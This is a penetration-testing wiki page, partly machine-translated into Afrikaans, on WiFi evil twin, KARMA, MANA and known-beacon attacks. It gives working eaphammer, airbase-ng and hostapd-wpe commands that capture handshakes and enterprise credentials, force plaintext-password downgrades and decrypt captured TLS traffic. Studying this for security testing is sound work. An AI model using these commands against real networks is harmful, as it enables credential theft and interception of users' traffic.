An evil twin attack maak gebruik van die wyse waarop WiFi clients netwerke herken, hoofsaaklik staatmakend op die netwerknaam (ESSID) sonder om te vereis dat die base station (access point) homself aan die client verifieer. Sleutelpunte sluit in:

  • Moeilikheid om te onderskei: Toestelle sukkel om te onderskei tussen legitieme en rogue access points wanneer hulle dieselfde ESSID en encryption type deel. Real-world networks gebruik dikwels meerdere access points met dieselfde ESSID om dekking naatloos uit te brei.
  • Client Roaming en Verbindingsmanipulasie: Die 802.11-protokol laat toestelle toe om te roam tussen access points binne dieselfde ESS. Aanvallers kan dit misbruik deur 'n toestel te lok om van sy huidige base station te disconnect en met 'n rogue een te connect. Dit kan bereik word deur 'n sterker signal aan te bied of die verbinding met die legitieme access point te ontwrig deur metodes soos deauthentication packets of jamming.
  • Uitdagings in uitvoering: Om 'n evil twin suksesvol uit te voer in omgewings met veelvuldige, goed geplaasde access points kan uitdagend wees. Deauthenticating 'n enkele legitieme access point lei dikwels daartoe dat die toestel met 'n ander legitieme access point verbind, tensy die aanvaller al die nabygeleë access points kan deauthenticate of die rogue access point strategies kan plaas.

You can create a very basic Open Evil Twin (no capabilities to route traffic to Internet) doing:

bash
airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

Jy kan ook 'n Evil Twin skep met eaphammer (let wel: om evil twins met eaphammer te skep, moet die koppelvlak should NOT be in monitor mode):

bash
./eaphammer -i wlan0 --essid exampleCorp --captive-portal

Of gebruik Airgeddon: Options: 5,6,7,8,9 (inside Evil Twin attack menu).

Let asseblief daarop let dat by verstek, as 'n ESSID in die PNL as WPA-beskermd gestoor is, die toestel nie outomaties aan 'n Open evil Twin sal koppel nie. Jy kan probeer om die regte AP te DoS en hoop dat die gebruiker handmatig aan jou Open evil twin sal koppel, of jy kan die regte AP DoS en 'n WPA Evil Twin gebruik om die handshake vas te vang (met hierdie metode sal jy nie die slagoffer by jou kan laat koppel nie omdat jy nie die PSK ken nie, maar jy kan die handshake vasvang en probeer krak).

Sommige OS en AV sal die gebruiker waarsku dat dit gevaarlik is om aan 'n Open network te koppel...

WPA/WPA2 Evil Twin

Jy kan 'n Evil Twin using WPA/2 skep en as die toestelle ingestel is om aan daardie SSID met WPA/2 te koppel, sal hulle probeer koppel. Hoe ook al, to complete the 4-way-handshake benodig jy ook om die wagwoord wat die kliënt gaan gebruik te weet. As jy dit nie weet nie, sal die verbinding nie voltooi word nie.

bash
./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

Enterprise Evil Twin

Om hierdie aanvalle te verstaan, beveel ek aan om eers die bondige WPA Enterprise explanation te lees.

Gebruik hostapd-wpe

hostapd-wpe benodig 'n konfigurasielêer om te werk. Om die generering van hierdie konfigurasies te outomatiseer, kan jy https://github.com/WJDigby/apd_launchpad gebruik (laai die python-lêer af in /etc/hostapd-wpe/).

bash
./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

In die konfigurasielêer kan jy baie verskillende dinge kies soos ssid, channel, user files, cret/key, dh parameters, wpa version and auth...

Using hostapd-wpe with EAP-TLS to allow any certificate to login.

Gebruik EAPHammer

bash
# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

Standaard gebruik EAPHammer die volgende authenticasiemetodes (let op GTC as die eerste een wat probeer om plaintext-wagwoorde te verkry, en daarna die gebruik van meer robuuste auth-metodes):

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

Dit is die standaardmetodologie om lang konneksietye te vermy. Jy kan egter ook aan die bediener die verifikasiemetodes van swakste na sterkste spesifiseer:

--negotiate weakest

Of jy kan ook gebruik:

  • --negotiate gtc-downgrade om die hoogs doeltreffende GTC-downgrade-implementering te gebruik (plaintext passwords)
  • --negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP om handmatig die aangebode metodes te spesifiseer (deur dieselfde auth methods in dieselfde volgorde as die organisasie aan te bied sal die aanval baie moeiliker wees om op te spoor).
  • Find more info in the wiki

Gebruik Airgeddon

Airgeddon kan vooraf gegenereerde certificated gebruik om EAP authentication aan WPA/WPA2-Enterprise-netwerke aan te bied. Die vals netwerk sal die konneksieprotokol na EAP-MD5 afgradeer, sodat dit die gebruiker en die MD5 van die wagwoord kan vang. Later kan die aanvaller probeer om die wagwoord te kraak.
Airggedon bied jou die moontlikheid van 'n continuous Evil Twin attack (noisy) of only create the Evil Attack until someone connects (smooth).

Foutopsporing van PEAP- en EAP-TTLS TLS-tonnels in Evil Twin-aanvalle

This method was tested in an PEAP connection but as I'm decrypting an arbitrary TLS tunnel this should also works with EAP-TTLS

Binne die konfigurasie van hostapd-wpe kommenteer die reël wat dh_file bevat (van dh_file=/etc/hostapd-wpe/certs/dh na #dh_file=/etc/hostapd-wpe/certs/dh)
Dit sal veroorsaak dat hostapd-wpe sleutels ruil met RSA in plaas van DH, sodat jy later die verkeer kan ontsleutel as jy die server se private sleutel ken.

Begin nou die Evil Twin deur hostapd-wpe met daardie aangepaste konfigurasie soos gewoonlik te gebruik. Begin ook wireshark in die koppelvlak wat die Evil Twin-aanval uitvoer.

Nou of later (wanneer jy reeds sommige authentikasiepogings vasgevang het) kan jy die private RSA-sleutel by wireshark voeg in: Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...

Voeg 'n nuwe inskrywing by en vul die vorm met hierdie waardes: IP address = any -- Port = 0 -- Protocol = data -- Key File (select your key file, om probleme te vermy kies 'n sleutel-lêer zonder being password protected).

En kyk na die nuwe "Decrypted TLS" tab:

KARMA, MANA, Loud MANA and Known beacons attack

ESSID and MAC black/whitelists

Verskillende tipes Media Access Control Filter Lists (MFACLs) en hul ooreenstemmende modi en effekte op die gedrag van 'n rogue Access Point (AP):

  1. MAC-based Whitelist:
  • Die rogue AP sal slegs reageer op probe versoeke van toestelle wat in die whitelist gespesifiseer is, en bly onsigbaar vir alle ander wat nie gelys is nie.
  1. MAC-based Blacklist:
  • Die rogue AP sal probe versoeke van toestelle op die blacklist ignoreer, wat die rogue AP effektief onsigbaar maak vir daardie spesifieke toestelle.
  1. SSID-based Whitelist:
  • Die rogue AP sal slegs op probe versoeke vir spesifieke ESSIDs in die lys reageer, en is onsigbaar vir toestelle waarvan die Preferred Network Lists (PNLs) daardie ESSIDs nie bevat nie.
  1. SSID-based Blacklist:
  • Die rogue AP sal nie op probe versoeke vir die spesifieke ESSIDs op die blacklist reageer nie, en maak dit onsigbaar vir toestelle wat na daardie netwerke soek.
bash
# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]
bash
# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

KARMA

Hierdie metode laat 'n attacker om 'n kwaadwillige access point (AP) te skep wat op alle probe requests reageer van toestelle wat probeer aansluit by netwerke. Hierdie tegniek mislei toestelle om aan die AP van die attacker te koppel deur die netwerke na te boots waarvoor die toestelle soek. Sodra 'n toestel 'n connection request aan hierdie rogue AP stuur, word die verbinding voltooi, en koppel die toestel per ongeluk aan die netwerk van die attacker.

MANA

Toe het toestelle begin om onbetroubare netwerkresponsies te ignoreer, wat die doeltreffendheid van die oorspronklike karma attack verminder het. Daaropvolgend is 'n nuwe metode, bekend as die MANA attack, deur Ian de Villiers en Dominic White geïntroduseer. Hierdie metode behels dat die rogue AP die Preferred Network Lists (PNL) van toestelle te kap deur op hul broadcast probe requests te reageer met netwerkname (SSIDs) wat voorheen deur die toestelle gestoor is. Hierdie gesofistikeerde aanval omseil die beskerming teen die oorspronklike karma attack deur die wyse waarop toestelle bekende netwerke onthou en prioritiseer uit te buit.

Die MANA attack werk deur beide directed en broadcast probe requests van toestelle te monitor. Vir directed requests neem dit die toestel se MAC address en die versoekte netwerknaam op, en voeg hierdie inligting by 'n lys. Wanneer 'n broadcast request ontvang word, reageer die AP met inligting wat ooreenstem met enige van die netwerke op die toestel se lys, en lok die toestel om aan die rogue AP te koppel.

bash
./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

Loud MANA

'n Loud MANA attack is 'n gevorderde strategie vir wanneer toestelle nie gerigte probing gebruik nie of wanneer hul Preferred Network Lists (PNL) aan die aanvaller onbekend is. Dit werk op die beginsel dat toestelle in dieselfde area waarskynlik sekere netwerkname in hul PNLs deel. In plaas daarvan om selektief te reageer, stuur hierdie aanval probe responses uit vir elke netwerknaam (ESSID) wat in die gekombineerde PNLs van alle waargenome toestelle gevind word. Hierdie wye benadering verhoog die kans dat 'n toestel 'n bekende netwerk herken en probeer koppel aan die rogue Access Point (AP).

bash
./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

Known Beacon attack

When the Loud MANA attack may not suffice, the Known Beacon attack presents another approach. Hierdie metode brute-forces die verbindingsproses deur 'n AP te simuleer wat op enige netwerknaam reageer, en deur 'n lys moontlike ESSIDs te draai wat uit 'n wordlist afgelei is. Dit simuleer die teenwoordigheid van talle netwerke, in die hoop om 'n ESSID binne die slagoffer se PNL te pas, wat 'n verbindingspoging na die gefabriseerde AP uitlok. Die aanval kan versterk word deur dit met die --loud opsie te kombineer vir 'n meer aggressiewe poging om toestelle te vang.

Eaphammer het hierdie aanval geïmplementeer as 'n MANA attack waar al die ESSIDs in 'n lys geadverteer word (you could also combine this with --loud to create a Loud MANA + Known beacons attack):

bash
./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

Known Beacon Burst attack

Die Known Beacon Burst attack behels die rapid-fire broadcasting of beacon frames for each ESSID listed in a file. Dit skep 'n digte omgewing van vals netwerke, wat die waarskynlikheid dat toestelle met die rogue AP koppel aansienlik verhoog, veral wanneer dit saam met 'n MANA attack gebruik word. Hierdie tegniek maak gebruik van spoed en hoeveelheid om toestelle se netwerkseleksiemeganismes te oorlaai.

bash
# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5

Wi-Fi Direct

Wi-Fi Direct is 'n protokol wat toestelle in staat stel om direk met mekaar te koppel via Wi-Fi sonder die behoefte aan 'n tradisionele wireless access point. Hierdie vermoë is geïntegreer in verskeie Internet of Things (IoT)-toestelle, soos drukkers en televisies, wat direkte toestel‑tot‑toestel kommunikasie vergemaklik. 'n Kenmerkende aspek van Wi-Fi Direct is dat een toestel die rol van 'n access point aanneem, bekend as die group owner, om die verbinding te bestuur.

Sekuriteit vir Wi-Fi Direct-verbindinge word gevestig deur Wi‑Fi Protected Setup (WPS), wat verskeie metodes vir veilige koppeling ondersteun, insluitend:

  • Push-Button Configuration (PBC)
  • PIN entry
  • Near-Field Communication (NFC)

Hierdie metodes, veral PIN entry, is vatbaar vir dieselfde kwesbaarhede as WPS in tradisionele Wi‑Fi-netwerke, wat hulle teikens maak vir soortgelyke aanvalvektore.

EvilDirect Hijacking

EvilDirect Hijacking is 'n aanval wat spesifiek is vir Wi‑Fi Direct. Dit weerspieël die konsep van 'n Evil Twin attack maar mik op Wi‑Fi Direct-verbindinge. In hierdie scenario doen 'n aanvaller voor as 'n wettige group owner met die doel om toestelle te mislei om aan 'n kwaadwillige entiteit te koppel. Hierdie metode kan uitgevoer word met hulpmiddels soos airbase-ng deur die kanaal, ESSID en MAC address van die geïmiteerde toestel te spesifiseer:

References

TODO: Take a look to https://github.com/wifiphisher/wifiphisher (aanmelding met Facebook en imitatie van WPA in captive portals)

tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks